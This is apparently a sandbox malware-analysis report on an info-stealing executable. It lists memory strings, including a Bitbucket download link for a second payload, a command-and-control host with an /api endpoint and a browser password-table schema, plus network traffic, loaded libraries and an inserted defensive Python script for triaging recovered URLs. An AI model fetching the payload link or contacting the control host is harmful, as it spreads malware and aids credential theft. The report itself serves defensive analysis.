Source: FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aui-cdn.atlassian.com/
Source: FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                Source: FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1875034913.0000000001263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
                Source: FBmz85HS0d.exe, 00000000.00000002.1875057545.0000000001277000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
                Source: FBmz85HS0d.exe, 00000000.00000002.1875057545.0000000001277000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/R
                Source: FBmz85HS0d.exe, 00000000.00000002.1874782719.0000000001215000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1874782719.00000000011FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: FBmz85HS0d.exe, 00000000.00000002.1874658046.0000000000EFA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
                Source: FBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                Source: FBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                Source: FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: FBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: FBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: FBmz85HS0d.exe, 00000000.00000003.1401268894.0000000001208000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1875034913.0000000001263000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401268894.00000000011FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/
                Source: FBmz85HS0d.exe, 00000000.00000003.1427588716.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/6x
                Source: FBmz85HS0d.exe, FBmz85HS0d.exe, 00000000.00000003.1402059464.0000000005902000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401108758.00000000058FE000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1874782719.0000000001215000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1404190506.0000000005902000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1403463916.0000000005902000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427588716.0000000001208000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1402568335.0000000005902000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1405842571.0000000001273000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1403839409.0000000005902000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1404908309.0000000005902000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1405410023.0000000005902000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401191621.0000000005901000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1400889425.00000000058F4000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1446443931.0000000001273000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427375694.0000000001277000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1403050358.0000000005902000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 
00000000.00000003.1404566168.0000000005902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/api
                Source: FBmz85HS0d.exe, 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1405842571.0000000001273000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427375694.0000000001277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apiB
                Source: FBmz85HS0d.exe, 00000000.00000003.1427375694.0000000001277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apiice
                Source: FBmz85HS0d.exe, 00000000.00000002.1874782719.0000000001215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apil
                Source: FBmz85HS0d.exe, 00000000.00000003.1427375694.0000000001287000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1446443931.0000000001287000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/aping
                Source: FBmz85HS0d.exe, 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apit
                Source: FBmz85HS0d.exe, 00000000.00000003.1401268894.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/d
                Source: FBmz85HS0d.exe, 00000000.00000003.1427588716.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/er.xiK
                Source: FBmz85HS0d.exe, 00000000.00000003.1401268894.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/nx
                Source: FBmz85HS0d.exe, 00000000.00000003.1378457678.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1874782719.0000000001215000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427541815.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1378025809.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1482628618.0000000001224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/pi
                Source: FBmz85HS0d.exe, 00000000.00000003.1427588716.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/s
                Source: FBmz85HS0d.exe, 00000000.00000003.1446443931.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/api
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: FBmz85HS0d.exe, 00000000.00000003.1554179926.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: FBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: FBmz85HS0d.exe, 00000000.00000003.1554179926.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: FBmz85HS0d.exe, 00000000.00000003.1554179926.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: FBmz85HS0d.exe, 00000000.00000003.1379201985.0000000005A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: FBmz85HS0d.exe, 00000000.00000003.1379201985.0000000005A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: FBmz85HS0d.exe, 00000000.00000003.1554179926.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: FBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1875034913.0000000001263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: FBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: FBmz85HS0d.exe, 00000000.00000003.1379201985.0000000005A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: FBmz85HS0d.exe, 00000000.00000003.1379201985.0000000005A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: FBmz85HS0d.exe, 00000000.00000003.1379201985.0000000005A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: FBmz85HS0d.exe, 00000000.00000003.1379201985.0000000005A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: FBmz85HS0d.exe, 00000000.00000003.1379201985.0000000005A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.5.25.82:443 -> 192.168.2.7:49752 version: TLS 1.2
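
                The URL strings recovered from memory above mix one real indicator with three kinds of noise: OCSP and CRL endpoints from certificate chains (with an ASN.1 length byte fused onto the end, hence "ocsp.digicert.com0C"), browser search-engine and new-tab defaults that sit in memory once browser profile data has been read, and the Bitbucket/S3 hosting the payload was downloaded from. What is left after that noise is discarded is cuddlyready.xyz, whose /api endpoint the report records in dozens of dumps with heap residue appended ("apiB", "aping", "apil"). The script below is an added example, not Joe Sandbox output: it parses strings shaped like these report rows, strips the fused bytes, groups by host, and treats only hosts outside an allowlist as C2 candidates. The sample strings and the allowlist suffixes are constructed for the example.

```python
"""Triage URL-like strings recovered from process memory dumps.

Added example for this report, not Joe Sandbox output. The strings below are a
constructed sample modelled on the report's "String found in binary or memory"
rows, and the allowlist is the editor's assumption about what is background noise.
"""
import re
from collections import Counter, defaultdict

# A hostname has to end in an alphabetic label, so digits or punctuation fused onto
# a URL read straight out of memory (the ASN.1 length byte after an OCSP URL in a
# certificate, e.g. "0C") fall off the host. Letters fused onto the TLD cannot be
# separated this way. The path stops where a second, concatenated URL begins
# ("favicon.icohttps://...").
URL_RE = re.compile(
    r"(https?)://([a-z0-9.-]+\.[a-z]{2,})(?::(\d+))?(/(?:(?!https?://)\S)*)?", re.I)

# Hosts found in almost any Windows process: certificate-chain PKI endpoints,
# browser search/new-tab defaults, and the file hosting the payload came from.
BENIGN_HOST_SUFFIXES = {
    "pki": ("digicert.com", "globalsign.com", "amazontrust.com", "lencr.org"),
    "browser_defaults": ("duckduckgo.com", "ecosia.org", "yahoo.com", "google.com", "mozilla.org"),
    "file_hosting": ("bitbucket.org", "amazonaws.com", "atl-paas.net", "atlassian.com", "cloudfront.net"),
}

# Constructed sample; the trailing junk and the repeated /api hits mirror the report.
RECOVERED_STRINGS = [
    "http://ocsp.digicert.com0C",
    "http://ocsp.rootca1.amazontrust.com0:",
    "http://secure.globalsign.com/cacert/root-r3.crt06",
    "https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=",
    "https://duckduckgo.com/ac/?q=",
    "https://www.mozilla.org/privacy/firefox/gro.allizom.www.",
    "https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe",
    "https://bbuseruploads.s3.amazonaws.com/",
    "https://cuddlyready.xyz/",
    "https://cuddlyready.xyz/api",
    "https://cuddlyready.xyz/api",
    "https://cuddlyready.xyz/api",
    "https://cuddlyready.xyz/apiB",
    "https://cuddlyready.xyz/aping",
    "https://cuddlyready.xyz/pi",
    "https://cuddlyready.xyz:443/api",
]


def extract_urls(s):
    """Yield (scheme, host, port, path) for every URL embedded in one recovered string."""
    for m in URL_RE.finditer(s):
        scheme, host, port, path = m.groups()
        yield scheme.lower(), host.lower(), int(port) if port else None, path or "/"


def classify_host(host):
    """Match on label boundaries only, so 'evil-digicert.com' is not allowlisted."""
    for category, suffixes in BENIGN_HOST_SUFFIXES.items():
        if any(host == sfx or host.endswith("." + sfx) for sfx in suffixes):
            return category
    return "unknown"


def triage(strings):
    """Per host: category, number of recoveries, path variants, explicit-port flag."""
    hosts = defaultdict(lambda: {"category": "unknown", "hits": 0,
                                 "paths": Counter(), "explicit_port": False})
    for s in strings:
        for _scheme, host, port, path in extract_urls(s):
            entry = hosts[host]
            entry["category"] = classify_host(host)
            entry["hits"] += 1
            entry["paths"][path] += 1
            if port is not None:
                entry["explicit_port"] = True
    return dict(hosts)


def c2_candidates(summary):
    """Hosts outside every allowlist, most frequently recovered first."""
    unknown = [h for h, e in summary.items() if e["category"] == "unknown"]
    return sorted(unknown, key=lambda h: -summary[h]["hits"])


def stable_path(summary, host):
    """The path repeated across dumps is the endpoint; one-off variants are heap residue."""
    return summary[host]["paths"].most_common(1)[0][0]


if __name__ == "__main__":
    summary = triage(RECOVERED_STRINGS)
    for host in c2_candidates(summary):
        print(host, summary[host]["hits"], stable_path(summary, host), sorted(summary[host]["paths"]))
```

                On the constructed sample the only candidate is cuddlyready.xyz with /api as its stable path, and the explicit ":443" variant is kept as a signal that the code built the URL from separate host and port fields. The allowlist is deliberately narrow: a host that merely resembles a trusted suffix ("evil-digicert.com") is not matched, which is the failure mode to watch for when hunting with suffix lists.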

                System Summary

                Source: FBmz85HS0d.exe | Static PE information: section name:
                Source: FBmz85HS0d.exe | Static PE information: section name: .rsrc
                Source: FBmz85HS0d.exe | Static PE information: section name: .idata
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Code function: 0_3_0122C0A9
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Code function: 0_3_0122E5C6
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Code function: 0_3_0122C0A9
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Code function: 0_3_0122E5C6
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Code function: 0_3_01211847
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 1876
                Source: FBmz85HS0d.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: FBmz85HS0d.exe | Static PE information: Section: ZLIB complexity 0.9974047517123288
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/5@3/3
                Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7312
                Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\6fa3acb1-c756-4303-ba0b-c83dca068396
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: FBmz85HS0d.exe, 00000000.00000003.1355708769.0000000005920000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1332262093.000000000590C000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1330039591.0000000005929000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: FBmz85HS0d.exe | ReversingLabs: Detection: 60%
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File read: C:\Users\user\Desktop\FBmz85HS0d.exe
                Source: unknown | Process created: C:\Users\user\Desktop\FBmz85HS0d.exe "C:\Users\user\Desktop\FBmz85HS0d.exe"
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 1876
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: webio.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: cryptbase.dll
